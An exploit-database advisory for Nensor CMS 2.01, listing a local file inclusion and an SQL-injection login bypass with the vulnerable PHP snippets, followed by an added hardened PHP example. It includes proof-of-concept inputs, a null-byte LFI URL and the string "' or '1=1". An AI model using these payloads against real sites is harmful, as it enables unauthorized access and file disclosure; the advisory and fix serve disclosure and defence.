Vendor: Nensor CMS
By: cr4wl3r
CVSS: 7.5 (HIGH)
Type: LFI and Auth Bypass
CWE: 22, 287
Product Name: Nensor CMS
Affected Version From: 2.01
Affected Version To: 2.01
Patch Exists: YES
CPE: a:nensor:nensor_cms
2012

Nensor CMS 2.01 Multiple Remote Vulnerabilities

Nensor CMS 2.01 is vulnerable to Local File Inclusion and Authentication Bypass. An attacker can exploit these vulnerabilities to gain access to sensitive information and execute arbitrary code on the server.

Mitigation:

Update to the latest version of Nensor CMS

Exploit-DB raw data:

===============================================
Nensor CMS 2.01 Multiple Remote Vulnerabilities
===============================================

[+] Nensor CMS 2.01 Multiple Remote Vulnerabilities

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : Inj3ct0r.com                                  0
1  [+] Support e-mail  : submit[at]inj3ct0r.com                        1
0                                                                      0
1                    ######################################            1
0                    I'm cr4wl3r  member from Inj3ct0r Team            1
1                    ######################################            0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

[+] Discovered By: cr4wl3r
[+] My id: http://inj3ct0r.com/author/945
[+] Original : http://inj3ct0r.com/exploits/11346
[+] Download: http://code.google.com/p/nensor-cms/downloads/list

[x] LFI:

$sPage=(isset($_GET["page"]))?$_GET["page"]:"";

if(is_file("".$sPage.".php")){
 include "".$sPage.".php";
}elseif(is_file("".$sPage.".js")){
 include "".$sPage.".js";
}

[x] LFI PoC: [path]/x/modules/javascript.php?sPage=[LFI%00]

[x] Auth Bypass:

$sql = "SELECT iKey,sUsername,iKeyGroup,bForumAdmin,sLanguage,sPassword,sMail,sType
    FROM tb_users
    WHERE sUsername='".strInput($_POST["sUsername"])."'
    AND sPassword='".md5($_POST["sPassword"])."'
    AND bActive=1";

[x] PoC: ' or '1=1


# Inj3ct0r.com [2010-03-18]
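
Hardened counterparts to the two snippets in the advisory, as an added example that is not Nensor CMS code or part of the original advisory: an allowlist plus path-containment check for the include, and a bound-parameter login query. The function names, the allowlist, the temp directory, the in-memory SQLite table (needs the pdo_sqlite extension) and the switch from md5() to password_hash() are assumptions.

```php
<?php
// Added example, not Nensor CMS code. resolvePage(), authenticate(), the
// allowlist and the sample data below are assumptions made for illustration.

// Map a requested page name to a file under $baseDir, or null if rejected.
function resolvePage(string $requested, string $baseDir, array $allowed): ?string
{
    if (!in_array($requested, $allowed, true)) {
        return null;   // allowlist: unknown names never reach the filesystem
    }
    $base = realpath($baseDir);
    foreach (['.php', '.js'] as $ext) {
        $real = realpath($baseDir . '/' . $requested . $ext);
        // Containment: the canonical path must still sit inside the module directory.
        if ($base !== false && $real !== false && is_file($real)
            && strpos($real, $base . DIRECTORY_SEPARATOR) === 0) {
            return $real;
        }
    }
    return null;
}

// Fetch the user through a bound parameter, then verify the stored hash.
function authenticate(PDO $db, string $username, string $password): ?array
{
    $stmt = $db->prepare(
        'SELECT iKey, sUsername, sPassword FROM tb_users WHERE sUsername = :u AND bActive = 1'
    );
    $stmt->execute([':u' => $username]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    // Assumes hashes were created with password_hash(), replacing the unsalted md5().
    $ok = $row !== false && password_verify($password, $row['sPassword']);
    return $ok ? $row : null;
}

// Constructed sample data: a temp module directory and an in-memory SQLite table.
$dir = sys_get_temp_dir() . '/nensor_demo_' . getmypid();
@mkdir($dir);
file_put_contents($dir . '/menu.js', '/* sample */');
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE tb_users (iKey INTEGER, sUsername TEXT, sPassword TEXT, bActive INTEGER)');
$db->prepare('INSERT INTO tb_users VALUES (1, ?, ?, 1)')
   ->execute(['admin', password_hash('correct horse', PASSWORD_DEFAULT)]);

var_dump(resolvePage('menu', $dir, ['menu']) !== null);          // name on the allowlist
var_dump(resolvePage('../other/config', $dir, ['menu']));        // constructed name, not on the allowlist
var_dump(authenticate($db, 'admin', 'correct horse') !== null);  // valid credentials
var_dump(authenticate($db, "' or '1=1", 'x'));                   // advisory's string, bound as a literal username
unlink($dir . '/menu.js'); rmdir($dir);
```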